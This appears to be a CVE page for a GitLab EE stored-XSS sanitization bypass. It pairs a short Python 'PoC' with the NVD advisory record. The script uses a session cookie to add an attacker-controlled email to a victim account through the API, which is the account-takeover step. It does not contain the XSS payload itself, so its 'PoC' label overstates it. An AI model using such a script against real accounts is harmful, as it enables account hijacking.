CVE-2026-2995

import requests # PoC for CVE-2026-2995: GitLab EE HTML Sanitization Bypass # This script simulates the API call that would be triggered by the stored XSS payload. TARGET_URL = "https://gitlab.example.com/api/v4/user/emails" # Requires a valid session cookie of an authenticated user COOKIE = "_gitlab_session=valid_session_cookie_here" ATTACKER_EMAIL = "[email protected]" headers = { "Cookie": COOKIE, "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest" } # Payload to add email data = { "email": ATTACKER_EMAIL } print(f"[*] Attempting to add {ATTACKER_EMAIL} to the account...") try: response = requests.post(TARGET_URL, json=data, headers=headers) if response.status_code == 201: print("[+] Success: Email added via XSS trigger simulation.") else: print(f"[-] Failed: {response.status_code} - {response.text}") except Exception as e: print(f"[!] Error: {e}")

{"cve": {"id": "CVE-2026-2995", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:58.347", "lastModified": "2026-03-26T17:42:57.473", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 15.4 before 18.8.7, 18.9 before 18.9.3, and 18.10 before 18.10.1 that could have allowed an authenticated user to add email addresses to targeted user accounts due to improper sanitization of HTML content."}, {"lang": "es", "value": "GitLab ha remediado un problema en GitLab EE que afecta a todas las versiones desde la 15.4 anteriores a la 18.8.7, la 18.9 anteriores a la 18.9.3, y la 18.10 anteriores a la 18.10.1 que podría haber permitido a un usuario autenticado añadir direcciones de correo electrónico a cuentas de usuario objetivo debido a una sanitización inadecuada del contenido HTML."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-80"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "15.4.0", "versionEndExcluding": "18.8.7", "matchCriteriaId": "022646FF-38A8-4EB1-A783-2C1E7DD3505A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.3", "matchCriteriaId": "C3240349-67A3-43E2-BAD9-EFAA3E0A5D31"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "2B8DF779-B99E-4096-B734-78AB1849D136"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/03/25/patch-release-gitlab-18-10-1-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/591065", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3564600", "source": "[email protected]", "tags": ["Permissions Required"]}]}}